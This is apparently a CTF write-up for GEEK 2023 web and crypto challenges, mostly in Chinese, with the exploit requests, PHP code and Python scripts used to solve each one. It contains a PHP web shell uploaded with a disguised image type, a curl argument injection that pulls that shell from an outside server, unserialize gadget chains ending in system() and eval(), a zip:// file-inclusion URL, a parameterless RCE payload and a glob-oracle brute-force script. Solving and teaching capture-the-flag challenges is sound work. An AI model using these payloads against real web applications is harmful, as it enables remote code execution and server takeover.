web
ezhttp
easy_php
POST /?syc=welcome%20to%20GEEK%202023!&lover=2e4 HTTP/2
Host: sdjmytlkvr9c2362p1nccahfa.node.game.sycsec.com
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1320
qw=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&yxx=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&SYC[GEEK.2023=Happy to see you!
unsign
<?php
// Gadget 1 (chain entry point): the destructor runs when the object is
// released, e.g. at script end after unserialize(). Whatever $cuit holds is
// called as a function, so a `lover` instance stored there has its
// __invoke() executed.
class syc
{
public $cuit;
// Echoes a marker, then calls the stored value as a callable.
public function __destruct()
{
echo("action!<br>");
$function=$this->cuit;
// Calling a variable that holds an object dispatches to that object's __invoke().
return $function();
}
}
// Gadget 2: __invoke() is reached from syc::__destruct(). It reads property
// QW off $yxx; when $yxx is a `web` object, which declares no QW property,
// PHP routes that read to web::__get().
class lover
{
public $yxx;
public $QW;
public function __invoke()
{
echo("invoke!<br>");
// Undefined-property read on $yxx -> its __get(), if it defines one.
return $this->yxx->QW;
}
}
// Gadget 3 (sink): __get() treats $eva1 as a function name and calls it with
// $interesting as the single argument -- an arbitrary-function-call
// primitive. Below it is filled with 'system' / 'cat /flag'.
// Defender's view: any class with a magic method becomes reachable once
// unserialize() sees attacker-controlled data; the fix is at the sink
// (never unserialize untrusted input), not in the gadget classes.
class web
{
public $eva1;
public $interesting;
// $var (the requested property name) is ignored.
public function __get($var)
{
echo("get!<br>");
$eva1=$this->eva1;
$eva1($this->interesting);
}
}
// Wire the chain syc -> lover -> web and print its serialized form; that
// string is the `url=` value shown below, handed to the target's unserialize().
$re=new syc();
$re->cuit=new lover();                   // syc::__destruct() will __invoke() this
$re->cuit->yxx=new web();                // lover::__invoke() reads ->QW on this -> web::__get()
$re->cuit->yxx->eva1='system';           // callable name used by web::__get()
$re->cuit->yxx->interesting='cat /flag'; // its single argument
echo serialize($re);
url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}
n00b_Upload
POST /upload_file.php HTTP/2
Host: cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Length: 315
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqmJNVHRgdkJ76BDI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg
GIF89a
<?=eval($_POST['cmd']);?>
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundaryqmJNVHRgdkJ76BDI--
curl
服务器上准备一个一句话马,然后开一个http服务,因为不能有冒号,所以开80端口
GIF89a
<?=eval($_POST['cmd']);?>
使用curl命令下载到环境里,另存为1.php
addr=-o 1.php xx.xxx.xxx.xxx/shell.php
然后访问
https://qbwtun5kbud0kg20s9fbp7p4f.node.game.sycsec.com/1.php
cmd=system('cat /tmp/Syclover');
famale_imp_l0ve
一道文件包含题,用到了zip协议,主要在题目限制了被包含文件的后缀时使用。
<?php
// o2takuXX said this one has a problem; forgot to look into it.
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
// Untrusted path taken straight from the query string.
$file = $_GET['file'];
// Only the last four characters are checked. Everything before them --
// including a stream-wrapper scheme such as zip:// (used in the solve
// below) -- is unconstrained, so the suffix check does not limit what is
// actually included. A safer design maps the parameter onto an allow-list
// of known files instead of including a caller-supplied path.
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
include($file);
}
?>
准备一个压缩包,压缩包的内容是一个cmd.jpg文件,然后文件内容是一句话马,然后压缩成zip文件
然后通过网站上传之后,用zip协议进行文件包含
https://w0co1yvttngpnhutm4avlaczb.node.game.sycsec.com/include.php?file=zip://upload/1cmd.jpg.zip%23cmd.jpg
Pupyy_rce
<?php
highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);
// NOTE(review): bareword, not a quoted string -- presumably meant include('flag.php').
include(flag.php);
// There is something good to see in the current directory 😋
if (isset($_GET['var']) && $_GET['var']) {
$var = $_GET['var'];
// Case-insensitive deny-list on a few keywords. A deny-list in front of
// eval() is not a security boundary; the eval() itself is the defect.
if (!preg_match("/env|var|session|header/i", $var,$match)) {
// Recursive pattern: removes nested calls of the form f(g(h())) that carry
// no literal arguments; only a lone ';' may remain. This forces the
// "parameterless" call shape the writeup below works within.
if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
eval($_GET['var']);
}
else die("WAF!!");
} else{
die("PLZ DONT HCAK ME😅");
}
}
这道题考点还是无参数RCE吧
print_r(scandir(getcwd()));获取一下当前路径下的文件
发现flag文件在数组的第四个位置,倒数第五个位置,用数组逆向也不太好操作,又把var和session、header给ban了,看了看对数组的一些操作
array_rand这个函数可以随机返回一个数组的键名
这里已经是得到了flag文件名对应的键了
array_flip这个函数可以交换键值,所以配合array_rand函数就可以获得flag文件名了
这就好说了,直接show_source,试几次就试到了flag文件
payload
show_source(array_rand(array_flip(scandir(getcwd()))));
ez_remove
<?php
highlight_file(__FILE__);
// Gadget: the destructor eval()s whatever string $lover holds, so any
// unserialize() of attacker-controlled data that yields a syc object ends
// in code execution when that object is released.
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
if(isset($_GET['web'])){
// Case-insensitive filter on the raw serialized blob. It matches the
// literal text "lover" only; the writeup below carries the same property
// name past it using the hex-escaped serialized string form.
if(!preg_match('/lover/i',$_GET['web'])){
$a=unserialize($_GET['web']);
// Throwing right after unserialize() is meant to abort before normal
// shutdown would destruct $a; the writeup below describes how GC still
// releases the object -- and runs __destruct() -- before this line.
throw new Error("快来玩快来玩~");
}
else{
echo("nonono");
}
}
?>
这道题首先用GC垃圾回收机制绕过throw new Error,然后用十六进制编码绕过对lover的过滤,最后用蚁剑绕过phpinfo里的disable_function。先上exp:
<?php
// Local copy of the target's class so serialize() produces a matching
// layout (same class name and property name).
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
// Object whose destructor payload is eval($_POST[1]); wrapping it in an
// array is the setup for the edit described below (i:1;i:0; -> i:0;i:0;),
// which the writeup says makes GC release the object early.
$a=new syc();
$a->lover="eval(\$_POST[1]);";
$b=array($a,0);
echo serialize($b);
运行得到
a:2:{i:0;O:3:"syc":1:{s:5:"lover";s:16:"eval($_POST[1]);";}i:1;i:0;}
把结尾的i:1;i:0;换成i:0;i:0;导致GC产生,然后用\6c\6f\76\65\72替换lover绕过正则,最后蚁剑连接就好,记得把https换成http,根目录下有一个f1ger文件,base64 f1ger就出来了
Akane!
php的一个反序列化题目
<?php
error_reporting(0);    // suppress all PHP error output
show_source(__FILE__); // display this file's source to the visitor
class Hoshino
{
public $Ruby;
private $Aquamarine; // not used by the chain; declared private here
// Calls func() on $Ruby. Idol declares no func(), so an Idol stored here is
// reached through Idol::__call().
public function __destruct()
{
$this->Ruby->func();
}
}
class Idol
{
public $Akane;
// Resets the path on unserialize, which would discard a caller-chosen
// value; the writeup below treats bypassing this method as one of the
// challenge's points.
public function __wakeup()
{
$this->Akane = '/var/www/html/The************************.php';
}
// Catch-all for undefined methods (reached via Hoshino::__destruct()).
// scandir() on $Akane: with a glob:// pattern the two die() messages leak
// whether the listing is non-empty -- the one-bit oracle the brute-force
// script below relies on.
public function __call($method,$args)
{
$Kana = count(scandir($this->Akane));
if ($Kana > 0) {
die('Kurokawa Akane');
} else {
die('Arima Kana');
}
}
}
$a = unserialize(base64_decode($_GET['tuizi'])); // sink: caller-controlled serialized data
?>
看了一下,考点一个是__wakeup函数的绕过,一个是glob协议爆破文件名;scandir函数的返回值是一个数组,利用数组的长度判断字符是否正确。先写一个序列化的demo:
<?php
// Local copy of the target class so serialize() yields a compatible layout.
class Hoshino
{
public $Ruby;
// NOTE(review): public here, private in the target; a private property
// serializes under a class-qualified key, so this demo's output differs
// from what the target itself would emit. The chain does not use it.
public $Aquamarine;
public function __destruct()
{
$this->Ruby->func();
}
}
// Local copy of the target class; __wakeup() and __call() are never run
// here, they only exist so the serialized form matches.
class Idol
{
public $Akane;
public function __wakeup()
{
$this->Akane = '/var/www/html/The************************.php';
}
public function __call($method,$args)
{
$Kana = count(scandir($this->Akane));
if ($Kana > 0) {
die('Kurokawa Akane');
} else {
die('Arima Kana');
}
}
}
$a = new Hoshino();
$a->Ruby=new Idol();                     // Hoshino::__destruct() -> Idol::__call()
$a->Ruby->Akane='glob:///var/www/html/'; // glob pattern the oracle will test
$a2=serialize($a);
// Raise Hoshino's declared property count from 2 to 3 while only two
// properties are present; presumably this count mismatch is the __wakeup()
// bypass the writeup mentions, keeping the Akane value above intact.
$b=str_replace(":2:",":3:",$a2);
echo($b)."\n";
echo base64_encode($b);
//O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:21:"glob:///var/www/html/";}s:10:"Aquamarine";N;}
//Tzo3OiJIb3NoaW5vIjozOntzOjQ6IlJ1YnkiO086NDoiSWRvbCI6MTp7czo1OiJBa2FuZSI7czoyMToiZ2xvYjovLy92YXIvd3d3L2h0bWwvIjt9czoxMDoiQXF1YW1hcmluZSI7Tjt9
得到字符串后用python写脚本
import requests
import string
import base64
# Character set tried at each unknown filename position.
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789."
# Known prefix of the target filename; grows by one character per confirmed position.
filename = "The"
url = "https://b5q90mpuhbnc7n6u7k0g73glp.node.game.sycsec.com/"
# Each outer iteration fixes one more character; 50 is a loose upper bound
# on the filename length (see the note after the script).
for num in range(1,50):
    for i in s:
        print(num)
        print(i)
        # Serialized Hoshino/Idol chain from the PHP demo above. The declared
        # length 25+num equals len('glob:///var/www/html/' + filename + i + '*')
        # only while every earlier position matched exactly one character.
        payload = 'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'+str(25+num)+':"glob:///var/www/html/'+filename+i+'*";}s:10:"Aquamarine";N;}'
        print(payload)
        parm='?tuizi='+base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        print(parm)
        r = requests.get(url=url+parm)
        # The server's die() message is a one-bit oracle: "Kurokawa Akane"
        # means the glob matched at least one entry.
        if "Kurokawa Akane" in r.text:
            filename += i
            print(num, filename)
            break
这样直接运行就可以爆破出文件名,我这里直接循环次数写的50,懒得数题目里的*号了,爆破结果在过程中能看到
文件名:TheS4crEtF1AgFi1EByo2takuXX.php
得到flag
SYC{QW410zJgUiSg9oclaL}
crypto
week1
proof_of_work
import hashlib
# Fixed suffix appended to every 4-character candidate (presumably the
# server-issued proof-of-work string).
s='mjpIZCsijFpQtaSv'
# Target hex digest the search must reproduce (SHA-256, despite the function name).
m = '6c327a60bb4beeea04b037e2c6ec50201be9a9c15351040dae09369717c18263'
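def revmd5(suffix=None, target=None):
    """Brute-force a 4-character printable-ASCII prefix for a SHA-256 proof of work.

    Despite the name, the hash is SHA-256 (that is what the original code
    computed). Candidates are every 4-tuple of characters chr(33)..chr(126),
    visited in the same lexicographic order as the original nested loops.

    Args:
        suffix: string appended to each candidate prefix; defaults to the
            module-level ``s``.
        target: expected hex digest; defaults to the module-level ``m``.

    Returns:
        The full preimage (prefix + suffix) whose digest equals ``target``,
        or None if the search space is exhausted. As before, the match and
        its digest are also printed.
    """
    import itertools

    if suffix is None:
        suffix = s
    if target is None:
        target = m
    alphabet = [chr(c) for c in range(33, 127)]
    for prefix in itertools.product(alphabet, repeat=4):
        candidate = ''.join(prefix) + suffix
        digest = hashlib.sha256(candidate.encode()).hexdigest()
        if digest == target:
            print(candidate)
            print(digest)
            print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
            # Stop the whole search: the original `break` only left the
            # innermost loop and kept iterating the outer three.
            return candidate
    return None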
revmd5() # module-level side effect: the search runs on import as well as when executed